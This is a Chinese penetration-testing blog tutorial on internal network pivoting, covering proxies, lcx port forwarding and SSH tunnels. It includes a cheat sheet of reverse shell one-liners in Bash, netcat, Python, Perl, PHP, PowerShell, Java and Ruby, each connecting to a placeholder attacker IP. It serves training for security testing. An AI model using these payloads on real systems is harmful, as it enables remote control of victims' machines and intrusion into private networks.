内网转发教程

已于 2024-07-10 15:47:13 修改
阅读量582 收藏 17
点赞数 18
分类专栏: 渗透测试 文章标签: 网络安全
于 2024-07-10 15:37:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44512510/article/details/140314636
版权

介绍

内网转发是一种网络技术,通过一台已受控的内网机器,将外部流量转发到内网中的其他目标设备。通常用于绕过防火墙或其他安全措施,使外部攻击者能够访问内部网络资源


代理方式

  • 正向代理

正向代理用于隐藏客户端的真实IP地址,通过代理服务器代表客户端向目标服务器发送请求,或并将服务器的响应返回给客户端

  • 反向代理

反向代理用于隐藏服务器的真实IP地址、均衡负载、缓存内容、以及增强安全性,通过代理服务器代表服务器接收客户端的请求。客户端的请求首先到达代理服务器,其根据请求将其转发给合适的服务器,并将服务器的响应返回给客户端


内网转发的前提

  • 受控节点

攻击者成功攻陷内网中的一台或多台机器,通常通过漏洞利用、钓鱼攻击、社工攻击等手段获得对该机器的访问权限


  • 网络可达性

受控机器需要能够与内网中的其他目标设备通信,确保能够将流量成功转发到目标设备上


  • 工具和权限

受控机器上需要具备必要的工具(如SSH、SOCKS代理、端口转发工具)和足够的权限,以设置和管理转发规则


反弹shell

反弹Shell用于通过外部服务器与受害者机器建立连接,控制受害者的计算机。以下是几种常见的反弹Shell方式:


  • Bash
bash -i >& /dev/tcp/<攻击者IP>/<端口> 0>&1
  • Netcat
nc -e /bin/bash <攻击者IP> <端口>
  • Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<攻击者IP>",<端口>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • Perl
perl -e 'use Socket;$i="<攻击者IP>";$p=<端口>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • PHP
php -r '$sock=fsockopen("<攻击者IP>",<端口>);exec("/bin/sh -i <&3 >&3 2>&3");'
  • PowerShell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<攻击者IP>",<端口>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535
  • Java
Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/<攻击者IP>/<端口>;cat <&5
  • Ruby
ruby -rsocket -e'f=TCPSocket.open("<攻击者IP>",<端口>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

端口转发


  • 下载zip文件后解压到指定的目录,并记住所在的目录,添加到系统环境变量Path中

在这里插入图片描述

  • listen模式:监听
lcx -listen <监听 slave 请求的端口> <等待连接的端口>

  • slave模式:连接
lcx -slave <本机 ip> <监听端口> <目标 ip> <目标端口>

  • tran模式:转发
lcx -tran <等待连接的端口> <目标 ip> <目标端口>

SSH反向代理

SSH 反向代理通过 SSH 隧道将内网服务暴露给外部访问

  • 工作原理:

SSH 反向代理的基本原理是通过 SSH 隧道将本地服务的端口转发到远程服务器上,从而使外部能够访问该服务。具体来说,它是在远程服务器上打开一个端口,所有对该端口的访问都会通过 SSH 隧道转发到本地服务


  • 使用:
# 本地端口转发
ssh -L 本地端口:目标IP:目标端口 用户@本地IP

# 远程端口转发
ssh -R 远程端口:目标IP:目标端口 用户@远程IP

#动态转发多个端口
ssh -D 本地端口 用户@远程IP

参数作用
-R指定远程端口转发,将远程服务器上的某个端口转发到本地计算机上的指定地址和端口
-L指定本地端口转发,将本地计算机上的某个端口转发到远程服务器上的指定地址和端口
-D创建一个SOCKS代理服务器,允许动态转发多个端口
-f在后台运行SSH会话
-N不执行远程命令,仅进行端口转发
-T不分配伺服终端
-C启用压缩
-i指定用于认证的私钥文件
-p指定远程服务器的端口号
-g允许远程服务器连接到本地转发的端口
-4强制SSH使用IPv4地址
-6强制SSH使用IPv6地址
-v显示详细的调试信息(v表示基本,vv表示更多调试信息,vvv表示最大调试信息)
Wrop
关注
专栏目录
Linux 利用 IP转发使内网连接到公网
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
09-06 4807
项目背景描述 实现方法 我们知道,Linux本身自带iptables包过滤,但是其还有一重要功能,即实现数据的转发,本文就利用Linux 自带 iptables 实现从一个网络接口到另一个接口的IP转发(数据包转发)。IP转发的概念是,使 Linux 机器像路由器一样将数据从一个网络发送到另一个网络。所以,它能作为一个路由器或者代理服务器,实现将一个连接的互联网或者网络连接共享给多个客户端机器。 ......
内网转发的基本操作
m0_64674174的博客
08-25 2218
我们需要一个代理搭建成功的标志,这里个人使用phstudy搭建网络服务,在失陷主机以及内网主机均开启http服务,已攻击机可以访问到内网主机的http服务为代理成功标志,失陷主机需要上传一些需要的工具,这里关闭失陷主机的安全中心,具体操作为直接搜索安全中心即可。内网穿透和内网转发这俩个概念的话,内网穿透是内网进入到外网,内网转发是指外网进入到内网,但是个人感觉实际功能上并无太大差距,都是为了实现外网能够访问打内网的某些服务,实际上还都是通过设置路由进行转发
内网转发
秋水的博客
10-14 3063
内网转发简介 在渗透测试中,当我们获得了外网服务器(如web服务器,ftp服务器,mali服务器等等)的一定权限后发现这台服务器可以直接或者间接的访问内网。此时渗透测试进入后渗透阶段,一般情况下,内网中的其他机器是不允许外网机器访问的。这时候,我们可以通过 端口转发(隧道) 或将这台外网服务器设置成为 代理,使得我们自己的攻击机可以直接访问与操作内网中的其他机器。实现这一过程的手段就叫做内网转...
内网转发简介
buffedon的博客
10-06 1034
内网转发内网转发分类分类方式一 (按原理分)分类方式二 (按攻击手法分)端口转发,隧道,代理,反弹shell反弹shell的目的端口转发动态转发本地转发远程转发端口转发与端口映射代理参考文章 在后渗透阶段,外网是无法访问内网的,因此可以通过 端口转发(隧道) 的方式,将web服务器作为代理,从而使得攻击者可以操控内网主机 内网转发分类 分类方式一 (按原理分) 代理方式 socket Netcat,netsh,LCX socks EW,Ssocks 隧道方式 SSH,HTTP,IMCP
内网渗透之代理转发
D0126_的博客
04-25 876
正向代理中,Proxy和Client同属一个区域,对Server是透明的;正向代理的是客户端,反向代理的是服务端,可以理解为正向代理是就比如年少时期喜欢那个Ta,当时很羞涩需要我自己(Lhost)写一份信(proxy)去告诉Ta,反向代理就是喜欢的那个Ta(Rhost)知道并且主动(proxy)过来告诉自己(Lhost)。Lhost只向proxy发送普通的请求,具体让他转到哪里,proxy自己判断,然后将返回的数据递交回来,这样的好处就是在某些防火墙只允许proxy数据进出的时候可以有效的进行穿透。
内网渗透之——内网转发(反弹shell、端口、代理)
热门推荐
wsnbbz的博客
04-03 1万+
目的 渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入。 需要转发的情况 1.A可以访问B的80端口,但是不能访问B的3389端口。 2.A可以访问B,B可以访问C,但是A不可以访问C,需要通过B转发数据,让A和C进行通信。 代理方式 正向代理 正向代理是客户端主动访问服务器的端口 我们常说的代理就是指正向代理,正向代理的过程,它...
IPOP4 内网端口转发工具
最新发布
06-14
【IPOP4内网端口转发工具】 IPOP4是一款强大的内网端口转发工具,它主要用于解决在内网环境中,由于网络限制无法直接访问公网服务的问题。通过端口转发技术,IPOP4使得内网用户能够通过一个公网入口访问原本无法...
open-dingtalk和nginx 做内网转发
fajing_feiyue的博客
07-01 948
前言 我们有服务部署在我们内网服务,需要暴露给合作方演示这种服务。之前找了 open-dingtalk 找了挺多配置没有发现关于做除了127.0.0.1 之外域名做转发, nginx 能够很好对域名进行转发。 实践 http://nginx.org/en/download.html nginx下载 修改nginx.conf 配置 监听9999 端口 和 localhost,127.0.0.1 域名 server { listen 9999; server_na
内网端口转发实战:LCX教程
"LCX使用教程介绍了如何利用此工具进行内网端口转发,解决外网访问内网特定服务的问题。在实际网络环境中,由于防火墙和安全策略,直接从外网访问内网服务通常受到限制。Lcx.exe作为一个端口转发工具,通过在被控制...
HD内网IP转发工具
09-18
用于内网渗透将自身机器映射到对方内网中,内网渗透利器
电脑教程开源内网穿透工具 frp 简单使用教程.rar
10-25
当外部请求到达服务器端时,服务器会转发这些请求到内网客户端,从而实现内网服务的公网访问。 2. 应用场景:FRP适用于各种内网服务,如个人网站、NAS存储、游戏服务器、监控系统等,无需公网IP,即可让外部用户...
内网内网转发】——代理转发_SSH代理转发
weixin_45588247的博客
09-22 2306
文章目录一、环境准备:二、工具:三、概念:四、学习目的:五、SSH代理转发介绍:六、SSH代理转发使用说明:七、SSH代理转发:1. 正向动态转发隧道:1.1 场景:1.2 网络拓扑图:1.3 说明:1.4 实验过程: 一、环境准备:   准备一台CentOS主机,并为CentOS主机添加一张网卡,并为它配置为处于内网环境。以下是网上配置过程: 1、添加网卡: 2、查看新添加的网卡mac地址: 3、找到新添加的网卡mac地址对应的是哪张网卡: 4、配置网卡: 命令: cd /etc/sysco
内网端口转发
路虽远,行将至。事虽难,做必达。
08-10 1104
在渗透过程中拿到主机权限后,下一步通常是进行内网横向,而企业内网在不出网的情况下,我们无法直接进行扫描、反弹shell等操作,这时候就需要搭建隧道来进行数据包转发,使我们能间接的与内网进行通信。...
内网渗透测试——内网转发
cldimd的博客
04-01 728
内网转发目的: 渗透测试中,我们往往会面对十分复杂的内网环境。比如最常用的防火墙,它会限制特定端口的数据包出入。 A可以访问B的80端口,但是不能访问B的3389端口。 A可以访问B,B可以访问C,但是A不可以访问C。需要通过B转发数据,让A和C进行通信。 代理: (一)正向代理 我们常说的代理就是指正向代理,正向代理的过程,它隐藏了真实的请求客户端,服务端不知道真实的客户...
内网端口转发与代理
xiaolan458的专栏
04-30 1115
内网端口转发与代理
reGeorg v1.0内网流量转发
arthur2612的博客
11-03 293
reGeorg v1.0 git Usage $ reGeorgSocksProxy.py [-h] [-l] [-p] [-r] -u [-v] Socks server for reGeorg HTTP(s) tunneller optional arguments: -h, --help show this help message an...
内网代理转发工具
tomyyyyy
12-09 3982
目录概念区分端口转发端口映射代理隧道端口转发工具概念讲解socket端口转发socks代理两者的异同端口转发常用工具msf反弹木马lcxportmapssh端口转发iptables 端口转发firewall 端口转发socks代理工具基于web服务的socks5工具reGeorgTunna能够进行多层代理的工具Earthworm(又称ew)Termitevenomfuso多功能型的代理工具frp...
内网端口转发 - 简单记录
fa1c4的blog
07-17 811
常见的端口流量转发工具 (1) SSH (2) EW (3) NetCat (4) LCX 常见目的 (1) 安全运维: 绕过堡垒机/防火墙限制, 建立TCP链接, 对内网服务器进行远程管理 (2) 内网渗透: 绕过堡垒机/防火墙限制, 实现对内网服务器的攻击 分类 (1) 本地转发 (2) 远程转发 (3) 动态转发 本地转发 本地主机开启端口转发功能, 需要在用户机执行 ssh -L 8866:196.168.10.1:23 -fN 196.168.10.2 示意图 远程转发 堡垒机开启端口转发功能
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值